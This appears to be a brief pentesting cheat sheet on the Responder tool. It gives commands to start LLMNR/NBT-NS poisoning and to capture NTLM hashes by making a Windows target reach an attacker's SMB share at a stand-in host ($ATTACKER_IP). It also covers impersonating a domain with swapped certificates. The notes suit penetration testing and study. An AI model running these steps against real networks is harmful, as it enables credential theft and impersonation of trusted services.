# Responder

* [lgandx's repo](https://github.com/lgandx/Responder.git)

Responder is an LLMNR, NBT-NS and MDNS poisoner with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication servers supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication.

## Usage

### Grab NTLM Token

* Set up Responder
```sh
responder -I tun0 -wrvd
```

* Open a shell on the Windows target and request the attacker's SMB share, i.e. Responder
```sh
dir \\$ATTACKER_IP\C$
```


### Impersonate Domain -- Change Responder's certificates

* After using nsupdate to add the attacker as a subdomain, do the following tasks
* Add a certificate and its private key to
```sh
/usr/share/responder/certs
```
* Edit `Responder.conf`
```
[HTTPS Server]

; Configure SSL Certificates to use
SSLCert = certs/cert.pem
SSLKey = certs/key.pem
```
* Start Responder
```sh
responder -I <interface>
```